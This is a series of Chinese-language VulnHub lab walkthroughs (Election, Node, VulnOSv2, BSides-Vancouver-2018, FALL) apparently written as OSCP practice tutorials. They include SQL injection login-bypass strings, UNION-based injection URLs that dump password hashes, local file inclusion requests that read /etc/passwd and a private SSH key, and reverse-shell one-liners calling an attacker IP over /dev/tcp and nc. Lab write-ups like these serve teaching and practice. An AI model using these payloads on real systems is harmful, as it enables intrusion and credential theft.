靶机-election 靶机地址：https://www.[vulnhub](https://so.csdn.net/so/search?q=vulnhub&spm=1001.2101.3001.7020).com/entry/election-1,503/DescriptionIt is an OSCP-like VM, Medium Level difficulty.主机探测 / 80探测全端口扫描，80和22端口开启目录扫描信息收集插件 wapplyzer扫出来的phpinforobots.txt文件，还有一个phpmyadmin，但是不存在弱口令，在本次靶机中没有任何作用election路径，其他三个都没有东西继续目录扫描有一个后台管理继续目录扫描密码泄露love: P@$$w0rd@123系统信息收集sudo和suid文件发现一个奇葩切换用户的文件，先放着继续信息收集，端口信息进程信息发现一个mysql，此时就可以去网站目录找配置文件，查看数据库密码信息数据库登录成功把全部的表都查一查可利用的信息 Zxc123!@#，切换用户yeslove也不行，所以这个数据没有任何用处，网页也登录不了来看这个文件找到一个应用的版本信息漏洞检索复制到当前目录，并开启一个卫星http服务首先判断是否存在wget命令，不存在的话可以使用curl -O没有权限是因为赋予执行权限，使用chmod添加一个可执行权限就好了，执行脚本就能提权成功本靶机主要是网页上的日志信息泄露，从而获取服务器普通用户权限，再根据机器上的应用程序版本的信息搜集，使用漏洞检索工具searchsploit，利用exp进行提权往期推荐【OSCP】sudo的上级目录提权，靶机SkyTower【OSCP】稀有靶机-Readme【OSCP】Hackme【OSCP】Tr0ll 靶机全系列（1-3），FTP被玩坏了【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏

提权靶机Node 主机探测 && 80端口探测端口扫描，只开启了3000和22端口，看样子就是要让我们从3000这个端口找22登录的信息访问3000端口的网页向我们新成员问好，一共有三个用户tom，mark，rastating切换到登录界面，sql侏儒万能密码 / 弱口令tom' or 1=1 --+ tom' or 1=1 -- + tom' or 1=1 # tom" or 1=1 # tom" || 1=1 # tom' || 1=1 --+这里意思就是说，MyPlace这个项目的介绍，告诉我们，注册的入口已经关闭了，我们可以查看用户的资料查看用户资料，三个人都是一个信息User xxx are still not completed, check back later to learn more about mark!用户界面的sql注入cookie伪造，利用cookie伪造，可以绕过前端验证的cookie找到app.js，暴露了所有的路由信息，但是没啥用基本都访问过了我们看看接口信息有一个/api/users访问，信息泄露了[ {"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true}, {"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false}, {"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false}, {"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false} ]识别一下吧，hash-identifier是一个hash值的识别工具https://www.cmd5.com/ 丢进去一个一个解密，只有第四个用户没有解出来myP14ceAdm1nAcc0uNT ：manchestertom ：spongebobmark ：snowflake有了账号密码，还可以测试ssh连接，刚开始端口扫描的时候是有一个22端口ssh的管理员 myP14ceAdm1nAcc0uNT 成功页面不清楚这是什么文件嘞换一个用户 tom那么只能从管理员用户的那个backup文件下手了查看文件内容，疑似base64重定向到一个zip文件，解压的时候，提示我们输入密码，看样子这就是一个备份的zip文件利用fcrackzip使用kali自带的字典破解zip压缩包切换到目录下，看样子应该是网站的源码了版本信息，包含了express.js版本和mongodb版本查看app.js泄露了数据库的密码盲猜ssh密码和数据库密码一模一样，登录成功内核信息收集漏洞检索，发现几个可能的内核提权漏洞复制到当前目录 searchsploit -m 编号开启http服务下载命令检查wget 192.168.111.128:8000/44300.c wget 192.168.111.128:8000/44298.c wget 192.168.111.128:8000/40049.c wget 192.168.111.128:8000/40871.c将四个文件传到靶机上进行编译，一个一个尝试，编译失败也不要紧，就换一个exp，最后得到44298.c这个exp能提权成功本靶机主要是前端express.js编写的前端项目，项目打包的源码暴露了api接口的信息，通过访问此api接口，由于后端的过滤不严谨，造成的信息泄露，进而获取了目标的权限往期推荐【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略【内网渗透】免工具，内网、域内信息收集的40种方式总结【渗透测试】ATT&CK靶场一，phpmyadmin，域渗透，内网横向移动攻略【渗透测试】Linux隐身登录

Blender软件的信息泄露---VulnOSv2 【oscp】Blender软件的信息泄露---VulnOSv2端口扫描80探测访问前端页面全端口扫描，有一个6667端口（一款多平台上可使用的IRC守护程序）wappalyzer信息收集使用dirb进行目录扫描都没有结果了，点击页面上的那个website，会跳转到这个页面这里要看仔细一点，这里字体是黑色的，有一个页面路径/jabcd0cs，和用户密码guest/guest去访问这个目录前可以直接使用这个用户登录一下ssh，很明显登录失败访问并登录登录成功这里有一个文件上传（add document）尝试上传shell.php（一句话木马），但是我们并不知道上传的目录在哪再次目录扫描，这次扫描需要加上这个隐藏的路径jabcd0cs这些方法都可以试试，还有一个执行文件的东西，找绝对路径，找到一句话木马的位置可惜都不行这时候就需要细心一点了searchsploit漏洞检索，找到一个漏洞有一个sql注入开始利用http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9暴库http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata # information_schema,drupal7,jabcd0cs,mysql,performance_schema,phpmyadmin暴表（jabcd0cs表）http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database() # odm_access_log,odm_admin,odm_category,odm_data,odm_department,odm_dept_perms,odm_dept_reviewer,odm_filetypes,odm_log,odm_odmsys,odm_rights,odm_settings,odm_udf,odm_user,odm_user_perms暴字段（jabcd0cs表）,但是没有任何关于密码的字段http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201, group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() # file_id,user_id,timestamp,action,id,admin,id,name,id,category,owner,realname,created,description,comment,status,department,default_rights,publishable,reviewer,reviewer_comments,id,name,fid,dept_id,rights,dept_id,user_id,id,type,active,id,modified_on,modified_by,note,revision,id,sys_name,sys_value,RightId,Description,id,name,value,descripti这里有一个注意点，就是用字符串表名来查表的时候查不出来，payload如下：http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201, group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name=odm_user这里要把表的字符串换成16进制，6f646d5f75736572所以完整暴字段（带表）的payload是http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201, group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name=0x6f646d5f75736572 # id,username,password,department,phone,Email,last_name,first_name,pw_reset_code查密码http://192.168.111.194/jabcd0cs/ajax_udf.php ?q=1 &add_value=odm_user%20UNION%20SELECT%201, group_concat(username,password),3,4,5,6,7,8,9 from odm_user # webmin # b78aae356709f8c31118ea613980954b # webmin1980 # guest # 084e0343a0486ff05530df6c705c8bb4 # guest知道了账号密码，第一时间测试ssh连接，连接成功了内核信息收集内核漏洞检索（没有漏洞）历史命令，看到用户vulnosadmin的目录下面的文件，有很多hydra的文件运行一下使用make命令（Makefile 是一个文本文件，其中定义了如何构建程序所需的规则和步骤。）再查看进程信息，ps -aux，包含了postgres数据库将/usr/share/wordlists/metasploit/postgres_default_pass.txt和postgres_default_user.txt文件传到靶机上，进行密码爆破。爆破出 postgres/postgres登录postgres数据库psql -h localhost -U postgresl，注意，postgres数据库查询语句区分大小写vulnosadmin / c4nuh4ckm3tw1c3将此文件复制到网页根目录下面本机下载，打开这个网站，并上传上去，点击旁边的那个框，就可以看到密码了https://imagetostl.com/cn/view-blend-onlineTips：.blend 文件是 Blender 软件的专有文件格式，用于保存 3D 制作项目。第二种方法，内核提权，信息收集低版本的内核提权传到靶机上，编译，并运行，提权成功注意点在使用sql注入的时候如果不能正常的根据表名查找数据，那么可以将其转换为十六进制，例如http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201, group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name=0x6f646d5f75736572 # odm_userpostgres数据库的登录命令psql -h localhost -U postgrespostgres数据库的查询语句，是区分大小写的l ：显示数据库c：切换连接的数据库往期推荐【oscp】Tr0ll 靶机全系列（1-3），FTP被玩坏了【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏HTB-Chemistry靶机渗透教程ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略开箱即用！265种windows渗透工具合集--灵兔宝盒

BSides-Vancouver-2018-Workshop，ftp匿名登录，wordpress渗透 【oscp】BSides-Vancouver-2018-Workshop，ftp匿名登录，wordpress渗透下载地址：https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova难度：相对简单，有很多种方法主机发现端口扫描利用ftp的默认用户进行匿名登录，查看文件ftp 192.168.209.136 cd public get users.txt.bk像是一个密码字典（其实是一个用户字典，当前系统用户包含了这些用户）目录扫描robots.txt爬虫协议一个wordpress站点继续目录扫描利用wpscan发现可能存在的用户名，并使用msf的字典 wpscan --url http://192.168.209.136/backup_wordpress -e u -P /usr/share/wordlists/metasploit/burnett_top_1024.txt有俩个用户分别是john和admin，以及john的密码enigma登录进去直接修改404反弹shell的php脚本（kali自带/usr/share/webshells/php/php-reverse-shell.php）kali开启监听反弹成功创建交互式终端python -c "import pty; pty.spawn('/bin/bash')"基本信息收集，Ubuntu 12.04.4 LTS ，3.11.0-15没有内核提权漏洞，在往期的靶机中我们查看数据库密码（站点用到的就是mysql肯定存在mysql服务），thiscannotbeit登录成功查看用户表使用hash-identifier hash识别工具，识别hash类型md5解密切换思路，继续信息收集，查看文件权限为777的文件find / -perm 777 -type f 2>/dev/null那么就可以直接反弹shell提权echo '/bin/bash -i >& /dev/tcp/192.168.209.130/6666 0>&1' > cleanup ./cleanupkali端是有反应的，自动退出了换一个反弹shell命令echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.209.130 6666 >/tmp/f' > cleanup ./cleanup往期推荐【oscp】Tr0ll 靶机全系列（1-3），FTP被玩坏了【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏HTB-Chemistry靶机渗透教程ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略开箱即用！265种windows渗透工具合集--灵兔宝盒

FALL，wfuzz对参数的模糊测试 【oscp】FALL，wfuzz对参数的模糊测试靶机地址：https://www.vulnhub.com/entry/digitalworldlocal-fall,726/连接好kali，主机发现 & 端口扫描，发现了两个http服务，一个是80端口一个9090端口这是80界面这是9090界面随便点点，文件包含伪协议如下（利用失败）php://filter/read=convert.base64-encode/resource=index.php php://filter/resource=index.php php://filter/string.strip_tags|convert.base64-decode/resource=shell.php data://text/plain,<?php%20phpinfo();?> data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b file:///etc/passwd http://127.0.0.1/cmd.php?cmd=php://input POST数据：<?php phpinfo()?>看到网站底部，2.2.15版本漏洞检索，但是需要鉴权我们并没有登录后台这里看到一个用户发送的一个消息，留着有一个后门接下来进行目录扫描，发现有一个test.phpdirsearch -u http://10.10.10.199利用wfuzz工具，对参数进行爆破，并筛选出响应长度在100到100000之间的结果wfuzz -u http://10.10.10.200/test.php?FUZZ=/etc/passwd -w /data/SecLists_Dict/Discovery/Web-Content/small_common.txt --ss "^(.{100,100000})$"此时发现有一个file参数，访问payload，并发现写那篇文章的qiu用户，curl http://10.10.10.200/test.php?file=/etc/passwd查看是否存在id_rsa，这个文件呢是私匙，在linux中它非常的敏感，如果用户泄露了此文件，那么攻击者就可以利用此文件免密登录服务器，通过下面的命令，可以看到目标服务器泄露了此用户的文件curl http://10.10.10.200/test.php?file=/home/qiu/.ssh/id_rsa确保私钥文件的权限被严格限制。通常，私钥文件的权限应设置为 600（只有所有者可以读写），否则可能利用不成功。curl http://10.10.10.200/test.php?file=/home/qiu/.ssh/id_rsa > qiu chmod 600 qiu ssh qiu@10.10.10.200 -i qiu登录成功后，进行内网信息收集，外网还有一个9090端口的web，那么就来看数据库配置，密码为P@ssw0rdINSANITY查看表数据mysql> select * from cms_users -> ; +---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+ | user_id | username | password | admin_access | first_name | last_name | email | active | create_date | modified_date | +---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+ | 1 | qiu | bc8b9059c13582d649d3d9e48c16d67f | 1 | qiu qing | chan | qiu@goodtech.inc | 1 | 2021-05-21 17:06:29 | 2021-05-22 02:28:53 | | 2 | patrick | 6aea70cc6a678f0f83a82e1c753d7764 | 1 | Patrick | Ong | patrick@goodtech.inc | 1 | 2021-05-22 02:28:33 | 2021-05-22 16:54:13 | +---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+ 2 rows in set (0.00 sec)解密失败基本信息收集uname -a hostname # 主机名 # 系统信息相关 lsb_release -a cat /etc/os-release cat /proc/version # 权限相关 sudo -l # 查看可以使用sudo的文件 find / -perm -4000 -print 2>/dev/null # 查找 SUID文件 ls -al /etc/cron* # 查看所有计划任务 find / -perm 777 -type f 2>/dev/null # 查看文件权限为777的文件信息 # 其他信息收集 ps -aux netstat -tulnp history 直到历史命令测试sudo，提权成功（之前的mysql服务器密码也可以尝试）往期推荐不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学防溯源小技巧ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术，ICMP封装穿透防火墙上线MSF/CS【渗透测试】linux隐身登录